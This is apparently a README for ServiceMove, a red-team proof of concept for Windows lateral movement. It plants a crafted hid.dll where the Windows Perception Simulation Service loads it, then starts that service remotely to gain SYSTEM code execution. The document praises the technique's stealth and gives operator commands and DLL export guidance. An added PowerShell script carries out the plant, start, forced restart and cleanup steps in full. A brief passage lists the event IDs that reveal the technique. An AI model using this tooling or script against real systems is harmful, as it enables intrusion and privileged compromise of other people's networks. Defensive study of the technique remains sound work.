New lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking code execution.

Overview

BOF - Lateral movement technique by abusing Windows Perception Simulation Service to achieve DLL hijacking


ServiceMove is proof-of-concept code for a lateral movement technique that abuses the Windows Perception Simulation Service to achieve code execution through DLL hijacking.

Every time the "Windows Perception Simulation Service" starts, it tries to load a DLL (hid.dll) that does not exist in its own directory. Because the application directory is searched before System32 in the default DLL search order, a crafted hid.dll placed in "C:\Windows\System32\PerceptionSimulation" is the copy the service loads. By dropping that DLL and starting the service remotely, we were able to achieve code execution as "NT AUTHORITY\SYSTEM" on the remote system.

The beauty of this technique is that it is relatively stealthy from an OPSEC standpoint: it does not produce the typical IOCs of other common lateral movement techniques (e.g., service creation/modification, scheduled task creation). All it does is drop a file on the remote system and start an existing service remotely. Note that those two actions are still observable on a monitored host: the remote file write shows up as a file-share access (Event ID 5145 when share auditing is enabled) or a file-creation event (e.g., Sysmon Event ID 11) under C:\Windows\System32\PerceptionSimulation, and the Service Control Manager logs the state change (System log Event ID 7036) when the service starts.

Limitation

Windows 10 1809 or later only (the service does not exist on earlier builds)

Command Line Usage

Version: 1.0
Author: Chris Au
Twitter: @netero_1010
Github: @netero1010

===General use===  
Command: bof-servicemove target /root/hid.dll  

===Force mode===  
Description: restart the service if the service is already running  
Command: bof-servicemove target /root/hid.dll force

===Cleanup mode===  
Description: stop the service if running and delete the DLL payload file  
Command: bof-servicemove target cleanup
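The three modes above, reproduced with built-in Windows tooling from an operator host that already holds local-administrator credentials on the target. This is an added example for illustration, not the ServiceMove BOF or any code from the project; it assumes the C$ admin share and the remote Service Control Manager are reachable, and it assumes the short service name is "perceptionsimulation" (confirm with `sc.exe \\<target> query perceptionsimulation` before relying on it).

```powershell
# Added example, not ServiceMove's own code. Reproduces the general, force and
# cleanup modes with Copy-Item over the C$ share and sc.exe against the remote SCM.
# Assumption: the short service name is "perceptionsimulation"; verify it with
#   sc.exe \\<target> query perceptionsimulation
param(
    [Parameter(Mandatory)] [string] $Target,
    [string] $DllPath,                                  # local crafted hid.dll
    [ValidateSet('general', 'force', 'cleanup')] [string] $Mode = 'general'
)

$ServiceName = 'perceptionsimulation'                   # assumption, see above
$RemoteDll   = "\\$Target\C$\Windows\System32\PerceptionSimulation\hid.dll"

function Get-RemoteServiceState {
    # Parse the "STATE : 4 RUNNING" line from sc.exe query output.
    $out = & sc.exe "\\$Target" query $ServiceName 2>&1 | Out-String
    if ($out -match 'STATE\s+:\s+\d+\s+(\w+)') { return $Matches[1] }
    throw "sc.exe query failed on $Target`: $out"
}

function Wait-RemoteServiceState([string] $Expected, [int] $TimeoutSec = 30) {
    $deadline = (Get-Date).AddSeconds($TimeoutSec)
    do {
        if ((Get-RemoteServiceState) -eq $Expected) { return }
        Start-Sleep -Seconds 1
    } while ((Get-Date) -lt $deadline)
    throw "$ServiceName did not reach $Expected within $TimeoutSec s"
}

switch ($Mode) {
    'cleanup' {
        # The DLL is mapped into the service process while it runs, so the
        # service must be stopped before the file can be deleted.
        if ((Get-RemoteServiceState) -ne 'STOPPED') {
            & sc.exe "\\$Target" stop $ServiceName | Out-Null
            Wait-RemoteServiceState 'STOPPED'
        }
        if (Test-Path $RemoteDll) { Remove-Item $RemoteDll -Force }
        "cleanup done on $Target"
    }
    default {
        if (-not $DllPath) { throw "-DllPath is required in $Mode mode" }
        $state = Get-RemoteServiceState
        if ($state -ne 'STOPPED') {
            # General mode refuses to touch a running service; force mode restarts it.
            if ($Mode -ne 'force') {
                throw "$ServiceName is $state on $Target; use -Mode force to restart it"
            }
            & sc.exe "\\$Target" stop $ServiceName | Out-Null
            Wait-RemoteServiceState 'STOPPED'
        }
        # The service's own directory is searched before System32, so the
        # planted hid.dll is the copy that gets loaded on the next start.
        Copy-Item -Path $DllPath -Destination $RemoteDll -Force
        & sc.exe "\\$Target" start $ServiceName | Out-Null
        Wait-RemoteServiceState 'RUNNING'
        "hid.dll planted and $ServiceName started on $Target"
    }
}
```

Usage mirrors the BOF: `.\servicemove.ps1 -Target host -DllPath .\hid.dll` for general mode, add `-Mode force` to restart an already-running service, and `.\servicemove.ps1 -Target host -Mode cleanup` to stop the service and remove the payload. Unlike the BOF, this runs as a normal PowerShell process and spawns sc.exe, so it is noisier on the operator side; it is meant to make the sequence of operations explicit, not to replace the BOF.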

Compile

make

Export Functions for "hid.dll"

The crafted hid.dll must export the functions the service expects from the real hid.dll, otherwise the service fails to load it. Refer to exports_function_hid.txt for the list of export names to forward.

Demo

HowTo

Owner
Chris Au